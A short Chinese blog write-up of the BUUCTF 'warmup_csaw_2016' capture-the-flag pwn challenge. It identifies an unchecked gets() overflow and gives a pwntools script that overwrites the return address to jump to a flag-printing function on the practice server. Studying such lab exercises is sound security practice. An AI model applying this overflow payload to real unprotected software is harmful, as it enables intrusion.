buuctf-warmup_csaw_2016

拿到文件,先checksec,没开启保护。

图片.png

运行,


图片.png

IDA查看,main函数中,可解读,gets没有限制输入长度,存在溢出。


图片.png
图片.png

payload:

from pwn import *
r=remote("node3.buuoj.cn",29434)
flag_addr=0x40060D
payload='a'*(0x40+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容